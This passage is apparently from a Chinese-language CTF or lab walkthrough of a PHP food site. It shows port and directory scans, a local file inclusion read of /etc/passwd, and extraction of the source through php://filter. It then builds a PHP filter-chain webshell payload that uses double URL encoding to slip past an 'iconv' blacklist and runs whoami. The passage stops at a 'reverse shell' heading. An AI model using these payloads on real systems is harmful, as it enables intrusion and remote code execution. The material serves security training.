ontent-Length:\\x2\nSF:074\\r\\nContent-Type:\\x20text\/html\\r\\nDate:\\x20Fri,\\x2029\\x20Mar\\x202024\nSF:\\x2003:43:36\\x20GMT\\r\\n\\r\\n<html><head><title>Error<\/title><\/head><body\nSF:>404\\x20-\\x20Not\\x20Found<\/body><\/html>")%r(LPDString,42,"HTTP\/1\\.1\\x20\nSF:400\\x20Bad\\x20Request\\r\\nContent-Length:\\x200\\r\\nConnection:\\x20close\\r\nSF:\\n\\r\\n")%r(LDAPSearchReq,42,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nCont\nSF:ent-Length:\\x200\\r\\nConnection:\\x20close\\r\\n\\r\\n")%r(SIPOptions,42,"HTT\nSF:P\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Length:\\x200\\r\\nConnection:\\\nSF:x20close\\r\\n\\r\\n")%r(WMSRequest,42,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Request\\\nSF:r\\nContent-Length:\\x200\\r\\nConnection:\\x20close\\r\\n\\r\\n");\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u5b9e\u5730\u52d8\u63a2<\/h3>\n
\u5f00\u653e\u4e8680<\/code>\u548c8080<\/code>\uff0c\u5c1d\u8bd5\u8bbf\u95ee\u4e00\u4e0b\uff1a<\/p>\n<\/div><\/p>\n\u8fd8\u7981\u6b62\u53f3\u952e\uff0c\u5c1d\u8bd5\u4e00\u4e0bctrl+U<\/code>\uff0c\u53ef\u4ee5\u770b\u5230\u6e90\u4ee3\u7801\u4e86\uff0c\u4f46\u662f\u6ca1\u5565\u4e1c\u897f\u3002<\/p>\n\u63d2\u4ef6\u53d1\u73b0\u4fe1\u606f\uff1a<\/p>\n
<\/div><\/p>\n\u518d\u770b8080<\/code>\u7aef\u53e3\uff1a<\/p>\n<\/div><\/p>\n\u63d2\u4ef6\u663e\u793a\u5176\u4fe1\u606f\u662f\uff1a<\/p>\n
<\/div><\/p>\n\u76ee\u5f55\u626b\u63cf<\/h3>\nferoxbuster -u http:\/\/10.0.2.14 | awk '{print $1, $6}' <\/code><\/pre>\n301 http:\/\/10.0.2.14\/images\n200 http:\/\/10.0.2.14\/images\/logo.png\n200 http:\/\/10.0.2.14\/images\/chicken.png\n200 http:\/\/10.0.2.14\/images\/menu_bg.jpg\n200 http:\/\/10.0.2.14\/images\/footer_logo.png\n200 http:\/\/10.0.2.14\/images\/stamp.png\n200 http:\/\/10.0.2.14\/css\/bootsnav.css\n200 http:\/\/10.0.2.14\/css\/flaticon.css\n200 http:\/\/10.0.2.14\/css\/custom.css\n200 http:\/\/10.0.2.14\/js\/bootsnav.js\n200 http:\/\/10.0.2.14\/images\/feature_bg.jpg\n200 http:\/\/10.0.2.14\/images\/drinks_bg.jpg\n200 http:\/\/10.0.2.14\/images\/small_slider_bg.jpg\n200 http:\/\/10.0.2.14\/images\/classic_bg.jpg\n200 http:\/\/10.0.2.14\/images\/large_slider_img.jpg\n301 http:\/\/10.0.2.14\/fonts\n200 http:\/\/10.0.2.14\/fonts\/Flaticon.woff\n200 http:\/\/10.0.2.14\/fonts\/Flaticon.svg\n200 http:\/\/10.0.2.14\/fonts\/Flaticon.ttf\n200 http:\/\/10.0.2.14\/fonts\/Flaticon.eot\n301 http:\/\/10.0.2.14\/js\n200 http:\/\/10.0.2.14\/js\/main.js\n301 http:\/\/10.0.2.14\/css\n200 http:\/\/10.0.2.14\/css\/animate.css\n200 http:\/\/10.0.2.14\/css\/color.css\n200 http:\/\/10.0.2.14\/images\/sign_bg.jpg\n200 http:\/\/10.0.2.14\/images\/lock_bg.jpg\n200 http:\/\/10.0.2.14\/images\/sides_bg.jpg\n200 http:\/\/10.0.2.14\/images\/header_bg.jpg\n200 http:\/\/10.0.2.14\/js\/gmaps.min.js\n200 http:\/\/10.0.2.14\/recipe.php\n200 http:\/\/10.0.2.14\/<\/code><\/pre>\n\u4ee5\u9632\u4e07\u4e00\u518d\u626b\u4e00\u4e0b\uff1a<\/p>\n
sudo dirsearch -u http:\/\/10.0.2.14 -e* -i 200,299-399 2>\/dev\/null<\/code><\/pre>\n[23:58:03] 301 - 303B - \/js -> http:\/\/10.0.2.14\/js\/\n[23:58:07] 301 - 309B - \/__MACOSX -> http:\/\/10.0.2.14\/__MACOSX\/\n[23:58:08] 200 - 3B - \/about.php\n[23:58:25] 301 - 304B - \/css -> http:\/\/10.0.2.14\/css\/\n[23:58:30] 301 - 306B - \/fonts -> http:\/\/10.0.2.14\/fonts\/\n[23:58:33] 200 - 653B - \/images\/\n[23:58:33] 301 - 307B - \/images -> http:\/\/10.0.2.14\/images\/\n[23:58:36] 200 - 485B - \/js\/<\/code><\/pre>\n\u518d\u626b\u63cf\u4e00\u4e0b8080<\/code>\u7aef\u53e3\uff1a<\/p>\nferoxbuster -u http:\/\/10.0.2.14:8080 | awk '{print $1, $6}' <\/code><\/pre>\n200 http:\/\/10.0.2.14:8080\/wildfly.css\n200 http:\/\/10.0.2.14:8080\/favicon.ico\n200 http:\/\/10.0.2.14:8080\/jbosscommunity_logo_hori_white.png\n302 http:\/\/10.0.2.14:8080\/console\n200 http:\/\/10.0.2.14:8080\/wildfly_logo.png\n200 http:\/\/10.0.2.14:8080\/<\/code><\/pre>\nsudo dirsearch -u http:\/\/10.0.2.14:8080 -e* -i 200,299-399 2>\/dev\/null<\/code><\/pre>\n[00:01:13] 302 - 0B - \/console\/ -> http:\/\/10.0.2.14:9990\/console\n[00:01:13] 302 - 0B - \/console\/j_security_check -> http:\/\/10.0.2.14:9990\/console\n[00:01:13] 302 - 0B - \/console\/login\/LoginForm.jsp -> http:\/\/10.0.2.14:9990\/console\n[00:01:13] 302 - 0B - \/console -> http:\/\/10.0.2.14:9990\/console\n[00:01:13] 302 - 0B - \/console\/payments\/config.json -> http:\/\/10.0.2.14:9990\/console\n[00:01:13] 302 - 0B - \/console\/base\/config.json -> http:\/\/10.0.2.14:9990\/console\n[00:01:18] 200 - 1KB - \/favicon.ico<\/code><\/pre>\n\u6f0f\u6d1e\u6316\u6398<\/h2>\n\u67e5\u770b\u654f\u611f\u76ee\u5f55<\/h3>\nhttp:\/\/10.0.2.14\/recipe.php\n# lol\nhttp:\/\/10.0.2.14\/about.php\n# lol\nhttp:\/\/10.0.2.14:8080\/console<\/code><\/pre>\n<\/div><\/p>\n\u795e\u9b54\u60c5\u51b5<\/h3>\n
80\u7aef\u53e3\u4e00\u76f4\u52a0\u8f7d\u4e0d\u51fa\u6765\u4ec0\u4e48\u4e1c\u897f\uff0c\u8981\u88c2\u5f00\u4e86\uff0c\u9b3c\u4f7f\u795e\u5dee\u7684\u60f3\u6362\u5230vmware\u4e0a\u8bd5\u8bd5\uff0c\u7ed3\u679c\u4e0d\u51fa\u610f\u6599\u5931\u8d25\u4e86\uff0c\u6de6\uff0c\u5012\u662f\u5728virtualbox\u6539\u4e3a\u6865\u63a5\u4ee5\u540e\uff0c\u5c1d\u8bd5\u53ef\u4ee5\u6253\u5f00\u4e86\uff1a<\/p>\n
<\/div><\/p>\n\u6539\u4e3a\/recipe.php<\/code>\uff0c\u53d1\u73b0\u4e86\u7279\u6b8a\u754c\u9762\uff1a<\/p>\n<\/div><\/p>\n\u6587\u4ef6\u5305\u542b<\/h3>\n
\u53d1\u73b0\u94fe\u63a5\u53ef\u80fd\u5b58\u5728\u6587\u4ef6\u5305\u542b\u7684\u6f0f\u6d1e\uff1a<\/p>\n
http:\/\/10.161.16.19\/recipe.php?file=fatty-burger.php<\/code><\/pre>\n\u5c1d\u8bd5\u76ee\u5f55\u7a7f\u8d8a\uff1a<\/p>\n
http:\/\/10.161.16.19\/recipe.php?file=..\/..\/..\/..\/..\/etc\/passwd<\/code><\/pre>\n\u4f46\u662f\u5931\u8d25\u4e86\uff1a<\/p>\n
Access denied !<\/code><\/pre>\n\u5c1d\u8bd5\u4f7f\u7528file\u534f\u8bae\u8bfb\u53d6\uff1a<\/p>\n
http:\/\/10.161.16.19\/recipe.php?file=file:\/\/\/etc\/passwd<\/code><\/pre>\nroot:x:0:0:root:\/root:\/usr\/bin\/zsh\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nsystemd-timesync:x:997:997:systemd Time Synchronization:\/:\/usr\/sbin\/nologin\nmessagebus:x:100:107::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:101:109:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:102:65534::\/run\/sshd:\/usr\/sbin\/nologin\ndnsmasq:x:103:65534:dnsmasq,,,:\/var\/lib\/misc:\/usr\/sbin\/nologin\npolkitd:x:996:996:polkit:\/nonexistent:\/usr\/sbin\/nologin\ntod:x:1002:1002:,,,:\/home\/tod:\/bin\/zsh<\/code><\/pre>\n\u770b\u5230tod<\/code>\u7528\u6237\u3002<\/p>\nfilter\u94fe\u63d0\u53d6\u6587\u4ef6<\/h3>\n
\u5c1d\u8bd5\u4f7f\u7528filter<\/code>\u63d0\u53d6\u51fa\u6765recipe.php<\/code>\uff1a<\/p>\nhttp:\/\/10.161.16.19\/recipe.php?file=php:\/\/filter\/read=convert.base64-encode\/resource=recipe.php<\/code><\/pre>\nCjwhRE9DVFlQRSBodG1sPgo8aHRtbCBsYW5nPSJmciI+CjxoZWFkPgogICAgPG1ldGEgY2hhcnNldD0iVVRGLTgiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxlPkZvb2Q8L3RpdGxlPgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJodHRwczovL21heGNkbi5ib290c3RyYXBjZG4uY29tL2Jvb3RzdHJhcC8zLjMuNi9jc3MvYm9vdHN0cmFwLm1pbi5jc3MiIC8+CiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Imh0dHBzOi8vbWF4Y2RuLmJvb3RzdHJhcGNkbi5jb20vZm9udC1hd2Vzb21lLzQuNi4zL2Nzcy9mb250LWF3ZXNvbWUubWluLmNzcyIgLz4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iY3NzL2ZsYXRpY29uLmNzcyIgLz4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iY3NzL2FuaW1hdGUuY3NzIj4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iY3NzL2Jvb3RzbmF2LmNzcyI+CiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9ImNzcy9jb2xvci5jc3MiPgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJjc3MvY3VzdG9tLmNzcyIgLz4KPC9oZWFkPgo8Ym9keSBkYXRhLXNweT0ic2Nyb2xsIiBkYXRhLXRhcmdldD0iI25hdmJhci1tZW51IiBkYXRhLW9mZnNldD0iMTAwIj4KICAgIDxuYXYgY2xhc3M9Im5hdmJhciBuYXZiYXItZGVmYXVsdCBib290c25hdiBuby1iYWNrZ3JvdW5kIG5hdmJhci1maXhlZCBibGFjayI+CiAgICAgICAgPGRpdiBjbGFzcz0iY29udGFpbmVyIj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0ibmF2YmFyLWhlYWRlciI+CiAgICAgICAgICAgICAgICA8YSBjbGFzcz0ibmF2YmFyLWJyYW5kIiBocmVmPSIjIj48aW1nIHNyYz0iaW1hZ2VzL2xvZ28ucG5nIiBjbGFzcz0ibG9nbyIgYWx0PSIiPjwvYT4KICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgPC9kaXY+CiAgICA8L25hdj4KICAgIDxzZWN0aW9uIGlkPSJibG9jayI+CiAgICAgICAgPGRpdiBjbGFzcz0iY29udGFpbmVyIj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0icm93Ij4KICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbC1tZC04IGNvbC1tZC1vZmZzZXQtMiI+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iZmVhdHVyZSI+CiAgICAgICAgICAgICAgICAgICAgICAgIDxoMT5XZWxjb21lICE8L2gxPgoJCQk8cCBzdHlsZT0iY29sb3I6IHJlZDsgZm9udC13ZWlnaHQ6IGJvbGQ7Zm9udC1zaXplOiAyNHB4OyI+Q2hvb3NlIGEgcmVjaXBlIDo8L3A+CiAgICAgICAgICAgICAgICAgICAgICAgIDx1bCBjbGFzcz0ibGlzdC1ncm91cCI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8bGkgY2xhc3M9Imxpc3QtZ3JvdXAtaXRlbSI+PGEgaHJlZj0iP2ZpbGU9ZmF0dHktYnVyZ2VyLnBocCI+RmF0dHkgQnVyZ2VyPC9hPjwvbGk+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8bGkgY2xhc3M9Imxpc3QtZ3JvdXAtaXRlbSI+PGEgaHJlZj0iP2ZpbGU9c2hhY2stYnVyZ2VyLnBocCI+U2hhY2sgQnVyZ2VyPC9hPjwvbGk+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8bGkgY2xhc3M9Imxpc3QtZ3JvdXAtaXRlbSI+PGEgaHJlZj0iP2ZpbGU9Y2hlZGRhci1idXJnZXIucGhwIj5DaGVkZGFyIEp1bmt5IFN0dWZmZWQgQnVyZ2VyczwvYT48L2xpPgogICAgICAgICAgICAgICAgICAgICAgICA8L3VsPgogICAgICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgIDwvZGl2PgogICAgICAgIDwvZGl2PgogICAgPC9zZWN0aW9uPgoKICAgIDxzY3JpcHQgc3JjPSJodHRwOi8vY29kZS5qcXVlcnkuY29tL2pxdWVyeS0xLjEyLjEubWluLmpzIj48L3NjcmlwdD4KICAgIDxzY3JpcHQgc3JjPSJodHRwczovL21heGNkbi5ib290c3RyYXBjZG4uY29tL2Jvb3RzdHJhcC8zLjMuNi9qcy9ib290c3RyYXAubWluLmpzIj48L3NjcmlwdD4KICAgIDxzY3JpcHQgc3JjPSJqcy9ib290c25hdi5qcyI+PC9zY3JpcHQ+CjwvYm9keT4KPC9odG1sPgoKCjw\/cGhwCmluaV9zZXQoJ2FsbG93X3VybF9pbmNsdWRlJywgJzAnKTsKCmZ1bmN0aW9uIGlzRm9yYmlkZGVuKCRpbnB1dCkgewogICAgcmV0dXJuIHN0cmlwb3MoJGlucHV0LCAiaWNvbnYiKSAhPT0gZmFsc2U7Cn0KCmlmKGlzc2V0KCRfR0VUWydmaWxlJ10pKSB7CiAgICAkZmlsZSA9ICRfR0VUWydmaWxlJ107CgogICAgaWYgKGlzRm9yYmlkZGVuKCRmaWxlKSkgewogICAgICAgIGVjaG8gIjxkaXYgY2xhc3M9J2NvbnRhaW5lcic+PGRpdiBjbGFzcz0nYWxlcnQgYWxlcnQtZGFuZ2VyJz5BY2Nlc3MgZGVuaWVkICE8L2Rpdj48L2Rpdj4iOwogICAgfSBlbHNlaWYgKHN0cm5jbXAoJGZpbGUsICIvIiwgMSkgIT09IDAgJiYgc3RybmNtcCgkZmlsZSwgIi4uIiwgMikgIT09IDApIHsKICAgICAgICBAaW5jbHVkZSgkZmlsZSk7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIjxkaXYgY2xhc3M9J2NvbnRhaW5lcic+PGRpdiBjbGFzcz0nYWxlcnQgYWxlcnQtZGFuZ2VyJz5BY2Nlc3MgZGVuaWVkICE8L2Rpdj48L2Rpdj4iOwogICAgfQp9Cj8+Cg==<\/code><\/pre>\n\u89e3\u7801\u4e00\u4e0b\uff1a<\/p>\n
<!DOCTYPE html>\n<html lang="fr">\n<head>\n <meta charset="UTF-8">\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <title>Food<\/title>\n <link rel="stylesheet" href="https:\/\/maxcdn.bootstrapcdn.com\/bootstrap\/3.3.6\/css\/bootstrap.min.css" \/>\n <link rel="stylesheet" href="https:\/\/maxcdn.bootstrapcdn.com\/font-awesome\/4.6.3\/css\/font-awesome.min.css" \/>\n <link rel="stylesheet" href="css\/flaticon.css" \/>\n <link rel="stylesheet" href="css\/animate.css">\n <link rel="stylesheet" href="css\/bootsnav.css">\n <link rel="stylesheet" href="css\/color.css">\n <link rel="stylesheet" href="css\/custom.css" \/>\n<\/head>\n<body data-spy="scroll" data-target="#navbar-menu" data-offset="100">\n <nav class="navbar navbar-default bootsnav no-background navbar-fixed black">\n <div class="container">\n <div class="navbar-header">\n <a class="navbar-brand" href="#"><img src="images\/logo.png" class="logo" alt=""><\/a>\n <\/div>\n <\/div>\n <\/nav>\n <section id="block">\n <div class="container">\n <div class="row">\n <div class="col-md-8 col-md-offset-2">\n <div class="feature">\n <h1>Welcome !<\/h1>\n <p style="color: red; font-weight: bold;font-size: 24px;">Choose a recipe :<\/p>\n <ul class="list-group">\n <li class="list-group-item"><a href="?file=fatty-burger.php">Fatty Burger<\/a><\/li>\n <li class="list-group-item"><a href="?file=shack-burger.php">Shack Burger<\/a><\/li>\n <li class="list-group-item"><a href="?file=cheddar-burger.php">Cheddar Junky Stuffed Burgers<\/a><\/li>\n <\/ul>\n <\/div>\n <\/div>\n <\/div>\n <\/div>\n <\/section>\n\n <script src="http:\/\/code.jquery.com\/jquery-1.12.1.min.js"><\/script>\n <script src="https:\/\/maxcdn.bootstrapcdn.com\/bootstrap\/3.3.6\/js\/bootstrap.min.js"><\/script>\n <script src="js\/bootsnav.js"><\/script>\n<\/body>\n<\/html>\n\n<?php\nini_set('allow_url_include', '0');\n\nfunction isForbidden($input) {\n return stripos($input, "iconv") !== false;\n}\n\nif(isset($_GET['file'])) {\n $file = $_GET['file'];\n\n if (isForbidden($file)) {\n echo "<div class='container'><div class='alert alert-danger'>Access denied !<\/div><\/div>";\n } elseif (strncmp($file, "\/", 1) !== 0 && strncmp($file, "..", 2) !== 0) {\n @include($file);\n } else {\n echo "<div class='container'><div class='alert alert-danger'>Access denied !<\/div><\/div>";\n }\n}\n?>\n<\/code><\/pre>\n\u5bf9iconv<\/code>,\/<\/code>,..<\/code>\u8fdb\u884c\u4e86\u8fc7\u6ee4\uff0c\u5c1d\u8bd5\u751f\u6210\u4e00\u4e2afilter<\/code>\u94fe\u5199\u5165\u9a6c\uff1ahttps:\/\/github.com\/synacktiv\/php_filter_chain_generator<\/a><\/p>\n\u5c1d\u8bd5\u751f\u6210\u4e00\u4e2a\u77ed\u4e00\u70b9\u7684\u94fe\uff0c\u4e0a\u6b21\u592a\u957f\u4e86\u8f93\u5165\u4e0d\u4e86\uff1a<\/p>\n
python3 .\/php_filter_chain_generator.py --chain '<?=`$_GET[0]` ?>'<\/code><\/pre>\nphp:\/\/filter\/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode\/resource=php:\/\/temp?0=whoami<\/code><\/pre>\n\u4f46\u662f\u8fd9\u6837\u662f\u4e0d\u591f\u7684\uff0c\u4e0a\u9762\u7981\u6b62\u4e86iconv<\/code>\uff0c\u6211\u4eec\u8fd8\u5f97\u8fdb\u884c\u4e8c\u6b21\u7f16\u7801\u4ee5\u7ed5\u8fc7\uff1a<\/p>\n\ni<\/code>\u7684\u5341\u516d\u8fdb\u5236\u7f16\u7801\u65b9\u5f0f\u4e3a%69<\/code>,%<\/code>\u7684\u5341\u516d\u8fdb\u5236\u7f16\u7801\u4e3a%25<\/code>\uff0c\u8fd9\u91cc\u5982\u679c\u53ea\u7f16\u7801\u4e00\u6b21\uff0c\u4ecd\u7136\u4f1a\u88ab\u6d4f\u89c8\u5668\u8bc6\u522b\u4e3aiconv<\/code>\uff0c\u4ece\u800c\u88ab\u62e6\u622a\u3002<\/p>\n<\/blockquote>\niconv\n%2569conv<\/code><\/pre>\nhttp:\/\/10.161.16.19\/recipe.php?file=php:\/\/filter\/convert.%2569conv.UTF8.CSISO2022KR|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.SE2.UTF-16|convert.%2569conv.CSIBM921.NAPLPS|convert.%2569conv.855.CP936|convert.%2569conv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.SE2.UTF-16|convert.%2569conv.CSIBM1161.IBM-932|convert.%2569conv.MS932.MS936|convert.%2569conv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.IBM869.UTF16|convert.%2569conv.L3.CSISO90|convert.%2569conv.UCS2.UTF-8|convert.%2569conv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.8859_3.UTF16|convert.%2569conv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP367.UTF-16|convert.%2569conv.CSIBM901.SHIFT_JISX0213|convert.%2569conv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.INIS.UTF16|convert.%2569conv.CSIBM1133.IBM943|convert.%2569conv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP861.UTF-16|convert.%2569conv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.865.UTF16|convert.%2569conv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.SE2.UTF-16|convert.%2569conv.CSIBM1161.IBM-932|convert.%2569conv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.INIS.UTF16|convert.%2569conv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP861.UTF-16|convert.%2569conv.L4.GB13000|convert.%2569conv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.UTF8.UTF16LE|convert.%2569conv.UTF8.CSISO2022KR|convert.%2569conv.UCS2.UTF8|convert.%2569conv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.PT.UTF32|convert.%2569conv.KOI8-U.IBM-932|convert.%2569conv.SJIS.EUCJP-WIN|convert.%2569conv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP367.UTF-16|convert.%2569conv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.PT.UTF32|convert.%2569conv.KOI8-U.IBM-932|convert.%2569conv.SJIS.EUCJP-WIN|convert.%2569conv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP367.UTF-16|convert.%2569conv.CSIBM901.SHIFT_JISX0213|convert.%2569conv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CSIBM1161.UNICODE|convert.%2569conv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.ISO2022KR.UTF16|convert.%2569conv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.INIS.UTF16|convert.%2569conv.CSIBM1133.IBM943|convert.%2569conv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.SE2.UTF-16|convert.%2569conv.CSIBM1161.IBM-932|convert.%2569conv.MS932.MS936|convert.%2569conv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.base64-decode\/resource=php:\/\/temp&0=whoami<\/code><\/pre>\n\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
\u53cd\u5f39shell<\/h3>\n
